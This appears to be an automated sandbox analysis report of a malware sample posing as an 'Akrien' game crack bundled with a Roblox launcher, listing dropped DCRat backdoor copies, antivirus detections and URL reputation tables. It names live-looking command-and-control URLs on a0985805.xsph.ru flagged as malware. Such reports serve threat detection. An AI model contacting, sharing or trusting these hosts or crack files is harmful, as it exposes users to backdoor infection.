            C:\Browserfont\refdhcp.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Browserfont\services.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Program Files (x86)\Windows Photo Viewer\en-GB\RDMwYUvZPK.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\ProgramData\RDMwYUvZPK.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Recovery\RDMwYUvZPK.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Users\Default\Saved Games\RDMwYUvZPK.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Users\Public\Videos\cmd.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\RobloxPlayerLauncher[1].exe0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\AkrienCrack.exe75%ReversingLabsByteCode-MSIL.Trojan.Uztuby
            C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe53%ReversingLabsWin64.PUA.Packunwan
            C:\Users\user\AppData\Local\Temp\AkrienPremiumCrackByHurminka.exe100%ReversingLabsWin32.Trojan.Generic
            C:\Users\user\AppData\Local\Temp\RBX-338F2523\RobloxPlayerLauncher.exe0%ReversingLabs
            C:\Users\user\AppData\Local\Temp\RobloxPlayerLauncher.exe0%ReversingLabs
            C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\RDMwYUvZPK.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Users\user\RDMwYUvZPK.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Windows\BitLockerDiscoveryVolumeContents\RDMwYUvZPK.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            C:\Windows\en-US\RuntimeBroker.exe88%ReversingLabsByteCode-MSIL.Backdoor.DCRat
            No Antivirus matches
            No Antivirus matches
            SourceDetectionScannerLabelLink
            https://crashpad.chromium.org/bug/new0%URL Reputationsafe
            https://crashpad.chromium.org/https://crashpad.chromium.org/bug/new0%URL Reputationsafe
            http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.htmlLicensed0%URL Reputationsafe
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
            http://www.apache.org/licenses/LICENSE-2.00%URL Reputationsafe
            https://crashpad.chromium.org/0%URL Reputationsafe
            https://127.0.0.16)0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperT0%Avira URL Cloudsafe
            https://uploads.backtrace.rbx.com/post--annotation=RobloxChannel=production--annotation=RobloxGitHas0%Avira URL Cloudsafe
            https://127.00%Avira URL Cloudsafe
            https://client-telemetry.roblox.com/P0%Avira URL Cloudsafe
            http://www.winimage.com/zLibDll0%URL Reputationsafe
            https://akrien.wtf/0%Avira URL Cloudsafe
            https://uploads.backtrace.rbx.com/post20%Avira URL Cloudsafe
            https://uploads.backtrace.rbx.com/post20%VirustotalBrowse
            https://akrien.wtf/1%VirustotalBrowse
            https://client-telemetry.roblox.com/P0%VirustotalBrowse
            https://127.00%VirustotalBrowse
            http://a0985805.xsph.ru/59f76ddc.php?naYPdddiZRB6w7di0cADh=W0seTdtj&1rZrAbBstq1paw=7HSDZSw4HaEhh8KAz100%Avira URL Cloudmalware
            https://ncs.roblox.com/upload0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/W0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperT0%VirustotalBrowse
            https://client-telemetry.roblox.com/7K0%Avira URL Cloudsafe
            https://uploads.backtrace.rbx.com/postD#0%Avira URL Cloudsafe
            https://uploads.backtrace.rbx.com/post--annotation=RobloxChannel=production--annotation=RobloxGitHas0%VirustotalBrowse
            http://akrien.wtf/akrienmc/api/v2/brain.php?a=UD25iC2Q8B4thsh770580%Avira URL Cloudsafe
            https://curl.se/docs/hsts.html0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper0%VirustotalBrowse
            https://ncs.roblox.com/upload0%VirustotalBrowse
            https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxBootstrapperPkgManifest.txthb0%Avira URL Cloudsafe
            http://a0985805.xsph.ru100%Avira URL Cloudmalware
            https://uploads.backtrace.rbx.com/postCrashUploadToBacktraceBaseUrla2440b0bfdada85f34d79b43839f2b49e0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayer0%VirustotalBrowse
            http://tools.medialab.sciences-po.fr/iwanthue/index.php0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper/bucket/zflag0%Avira URL Cloudsafe
            https://uploads.backtrace.rbx.com/postCrashUploadToBacktraceBaseUrla2440b0bfdada85f34d79b43839f2b49e0%VirustotalBrowse
            https://127.0.0.1WindowsBootstrapperRecoveryInstallerUrlWindowsBootstrapperAlternativeAdminKeyDeploy0%Avira URL Cloudsafe
            http://a0985805.xsph.ru7%VirustotalBrowse
            https://uploads.backtrace.rbx.com/postD#0%VirustotalBrowse
            https://uploads.backtrace.rbx.com/post0%Avira URL Cloudsafe
            http://tools.medialab.sciences-po.fr/iwanthue/index.php0%VirustotalBrowse
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper/bucket/zflag0%VirustotalBrowse
            https://ephemeralcounters.api.roblox.com/0%Avira URL Cloudsafe
            https://akrien.wtf/akrienmc/api/v2/brain.php?a=UD25iC2Q8B4thsh770580%Avira URL Cloudsafe
            https://setup.rbxcdn.com/ersion-d6abc3b106a04c5c-rbxInstallerPkgManifest.txt0%Avira URL Cloudsafe
            https://uploads.backtrace.rbx.com/post0%VirustotalBrowse
            https://client-telemetry.roblox.com/0%Avira URL Cloudsafe
            http://crl.microsoftBU0%Avira URL Cloudsafe
            https://ephemeralcounters.api.roblox.com/0%VirustotalBrowse
            https://client-telemetry.roblox.com/0%VirustotalBrowse
            http://a0985805.xsph.ru/59f76ddc.php?k1z6lifha3Idda=zJqsGbE9fMU9rrosWdn6UVtijiQ1Xya&Tl=2I0f9g1TuQiyz100%Avira URL Cloudmalware
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperJ0%Avira URL Cloudsafe
            https://ephemeralcounters.api.roblox.com/d0%Avira URL Cloudsafe
            https://ephemeralcounters.api.roblox.com/x_age0%Avira URL Cloudsafe
            https://ephemeralcounters.api.roblox.com/d$60%Avira URL Cloudsafe
            http://ww(w.d0%Avira URL Cloudsafe
            http://a0985805.xsph.ru/@=MGZkZzNmlTN100%Avira URL Cloudmalware
            https://ephemeralcounters.api.roblox.com/d0%VirustotalBrowse
            http://a0985805.xsph.ru/100%Avira URL Cloudmalware
            https://clientsettingscdn.roblox.com/)0%Avira URL Cloudsafe
            http://a0985805.xsph.ru/@=MGZkZzNmlTN4%VirustotalBrowse
            https://127.0.0.1tleThreshold0%Avira URL Cloudsafe
            https://ephemeralcounters.api.roblox.com/30%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperJ0%VirustotalBrowse
            http://a0985805.xsph.ru/7%VirustotalBrowse
            https://curl.se/docs/http-cookies.html0%Avira URL Cloudsafe
            https://ecsv2.roblox.com/client/pbeMs2%l0%Avira URL Cloudsafe
            https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxInstallerPkgManifest.txtL0%Avira URL Cloudsafe
            https://setup.rbxcdn.com/0%Avira URL Cloudsafe
            http://www.roblox.comURLInfoAboutFailed0%Avira URL Cloudsafe
            https://ephemeralcounters.api.roblox.com/30%VirustotalBrowse
            https://ecsv2.roblox.com/client/pbeTelemetryV2UrlFFlagRolloutDuplicateRobloxTelemetryCountersEnabled0%Avira URL Cloudsafe
            https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxInstallerPkgManifest.txtW0%Avira URL Cloudsafe
            https://curl.se/docs/alt-svc.html0%Avira URL Cloudsafe
            https://curl.se/docs/hsts.html0%VirustotalBrowse
            https://ecsv2.roblox.com/client/pbeMs2?0%Avira URL Cloudsafe
            https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxInstallerPkgManifest.txtZ0%Avira URL Cloudsafe
            https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxBootstrapperPkgManifest.txt0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerr0%Avira URL Cloudsafe
            https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxBootstrapperPkgManifest.txt60%Avira URL Cloudsafe
            https://127.0.0.10%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/0%Avira URL Cloudsafe
            https://uploads.backtrace.rbx.com/postT0%Avira URL Cloudsafe
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper/bucket/zflagw0%Avira URL Cloudsafe
            https://ephemeralcounters.api.roblox.com/v1.1/Counters/BatchIncrement?apiKey=76E5A40C-3AE1-4028-9F100%Avira URL Cloudsafe
            http://bit.ly/1eMQ42U0%Avira URL Cloudsafe
            https://ephemeralcounters.api.roblox.com/v1.0/SequenceStatistics/BatchAddToSequencesV2?apiKey=76E5A40%Avira URL Cloudsafe
            http://www.winimage.com/zLibDll-1.2.11rbr0%Avira URL Cloudsafe
            https://ecsv2.roblox.com/client/pbe0%Avira URL Cloudsafe
            https://ephemeralcounters.api.roblox.com/(0%Avira URL Cloudsafe
            https://akrien.wtf/&0%Avira URL Cloudsafe
            No contacted domains info
            NameMaliciousAntivirus DetectionReputation
            http://a0985805.xsph.ru/@=MGZkZzNmlTNtrue
            • 4%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            NameSourceMaliciousAntivirus DetectionReputation
            https://client-telemetry.roblox.com/PRobloxPlayerLauncher.exe, 00000001.00000002.1992167381.00000000041F0000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://uploads.backtrace.rbx.com/post--annotation=RobloxChannel=production--annotation=RobloxGitHasRobloxPlayerLauncher.exe, 00000003.00000002.1998224998.000000000157B000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://127.0.0.16)RobloxPlayerLauncher.exe, 00000003.00000002.1998224998.000000000157B000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperTRobloxPlayerLauncher.exe, 00000001.00000002.1991396263.000000000150B000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://127.0RFAwChXSve.exe, 00000000.00000003.1727884209.0000000003329000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://akrien.wtf/AkrienPremiumCrack.exe, 00000004.00000002.4189782115.0000000003292000.00000004.00000020.00020000.00000000.sdmpfalse
            • 1%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://crashpad.chromium.org/bug/newRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • URL Reputation: safe
            unknown
            https://uploads.backtrace.rbx.com/post2RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://a0985805.xsph.ru/59f76ddc.php?naYPdddiZRB6w7di0cADh=W0seTdtj&1rZrAbBstq1paw=7HSDZSw4HaEhh8KAzRDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002E25000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            unknown
            https://clientsettingscdn.roblox.com/WRobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://ncs.roblox.com/uploadRobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.2005526699.00000000040D7000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994692062.00000000040BF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994866454.00000000040C1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998489973.00000000015F4000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://clientsettingscdn.roblox.com/v2/client-version/WindowsPlayerRobloxPlayerLauncher.exe, 00000001.00000002.1991396263.0000000001539000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988782815.0000000001538000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988573436.0000000001533000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperRobloxPlayerLauncher.exe, 00000001.00000002.1991396263.000000000150B000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995103781.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998396045.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://client-telemetry.roblox.com/7KRobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://crashpad.chromium.org/https://crashpad.chromium.org/bug/newRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • URL Reputation: safe
            unknown
            https://uploads.backtrace.rbx.com/postD#RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://akrien.wtf/akrienmc/api/v2/brain.php?a=UD25iC2Q8B4thsh77058AkrienPremiumCrack.exe, 00000004.00000002.4189782115.0000000003292000.00000004.00000020.00020000.00000000.sdmp, AkrienPremiumCrack.exe, 00000004.00000002.4189782115.00000000032BC000.00000004.00000020.00020000.00000000.sdmp, AkrienPremiumCrack.exe, 00000004.00000002.4189782115.00000000032A5000.00000004.00000020.00020000.00000000.sdmp, AkrienPremiumCrack.exe, 00000004.00000002.4188930888.0000000000492000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://curl.se/docs/hsts.htmlRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://setup.rbxcdn.com/version-d6abc3b106a04c5c-rbxBootstrapperPkgManifest.txthbRobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://a0985805.xsph.ruRDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002E25000.00000004.00000800.00020000.00000000.sdmptrue
            • 7%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            https://uploads.backtrace.rbx.com/postCrashUploadToBacktraceBaseUrla2440b0bfdada85f34d79b43839f2b49eRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://tools.medialab.sciences-po.fr/iwanthue/index.phpRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapper/bucket/zflagRobloxPlayerLauncher.exe, 00000003.00000002.1998489973.00000000015F4000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://www.ascendercorp.com/http://www.ascendercorp.com/typedesigners.htmlLicensedAkrienPremiumCrack.exe, 00000004.00000002.4191571770.0000000140129000.00000002.00000001.01000000.00000009.sdmpfalse
            • URL Reputation: safe
            unknown
            https://127.0.0.1WindowsBootstrapperRecoveryInstallerUrlWindowsBootstrapperAlternativeAdminKeyDeployRFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • Avira URL Cloud: safe
            unknown
            https://uploads.backtrace.rbx.com/postRobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://ephemeralcounters.api.roblox.com/RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992465027.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988611713.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994811368.00000000015F4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.2005374246.00000000040B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.2005445454.00000000040C1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994692062.00000000040BF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994866454.00000000040C1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998489973.00000000015F4000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://akrien.wtf/akrienmc/api/v2/brain.php?a=UD25iC2Q8B4thsh77058AkrienPremiumCrack.exe, 00000004.00000002.4189782115.00000000032BC000.00000004.00000020.00020000.00000000.sdmp, AkrienPremiumCrack.exe, 00000004.00000002.4189782115.00000000032A5000.00000004.00000020.00020000.00000000.sdmp, AkrienPremiumCrack.exe, 00000004.00000002.4188930888.0000000000492000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://setup.rbxcdn.com/ersion-d6abc3b106a04c5c-rbxInstallerPkgManifest.txtRobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042A6000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992465027.00000000042A6000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://client-telemetry.roblox.com/RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015C4000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992167381.00000000041F0000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            http://crl.microsoftBURobloxPlayerLauncher.exe, 00000003.00000002.2005445454.00000000040C1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994692062.00000000040BF000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1994866454.00000000040C1000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://a0985805.xsph.ru/59f76ddc.php?k1z6lifha3Idda=zJqsGbE9fMU9rrosWdn6UVtijiQ1Xya&Tl=2I0f9g1TuQiyzRDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            unknown
            https://clientsettingscdn.roblox.com/v2/settings/application/PCClientBootstrapperJRobloxPlayerLauncher.exe, 00000001.00000002.1991396263.000000000150B000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://ephemeralcounters.api.roblox.com/dRobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://ephemeralcounters.api.roblox.com/x_ageRobloxPlayerLauncher.exe, 00000001.00000003.1987825890.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1992465027.00000000042BA000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988611713.00000000042BA000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namerefdhcp.exe, 00000009.00000002.1917392588.0000000002D7E000.00000004.00000800.00020000.00000000.sdmp, RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpfalse
            • URL Reputation: safe
            unknown
            https://ephemeralcounters.api.roblox.com/d$6RobloxPlayerLauncher.exe, 00000003.00000003.1994735562.0000000001621000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998556322.0000000001622000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://ww(w.dRFAwChXSve.exe, 00000000.00000003.1727884209.0000000003329000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            http://a0985805.xsph.ru/RDMwYUvZPK.exe, 00000028.00000002.4191108963.0000000002BF1000.00000004.00000800.00020000.00000000.sdmptrue
            • 7%, Virustotal, Browse
            • Avira URL Cloud: malware
            unknown
            http://www.apache.org/licenses/LICENSE-2.0AkrienPremiumCrack.exe, 00000004.00000002.4191571770.0000000140129000.00000002.00000001.01000000.00000009.sdmpfalse
            • URL Reputation: safe
            unknown
            https://clientsettingscdn.roblox.com/)RobloxPlayerLauncher.exe, 00000001.00000003.1988432478.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1991537782.00000000015A9000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://127.0.0.1tleThresholdRobloxPlayerLauncher.exe, 00000001.00000002.1991396263.0000000001539000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988782815.0000000001538000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000003.1988573436.0000000001533000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995103781.00000000015B0000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1998396045.00000000015B1000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000003.00000003.1995049871.00000000015A8000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            https://crashpad.chromium.org/RFAwChXSve.exe, 00000000.00000003.1729652260.00000000036AC000.00000004.00000020.00020000.00000000.sdmp, RobloxPlayerLauncher.exe, 00000001.00000000.1732831327.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000000.1748405110.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe, 00000003.00000002.1996007857.0000000000A47000.00000002.00000001.01000000.00000005.sdmp, RobloxPlayerLauncher.exe.1.drfalse
            • URL Reputation: safe
            unknown
            https://ephemeralcounters.api.roblox.com/3RobloxPlayerLauncher.exe, 00000003.00000002.2005374246.00000000040B0000.00000004.00000020.00020000.00000000.sdmpfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
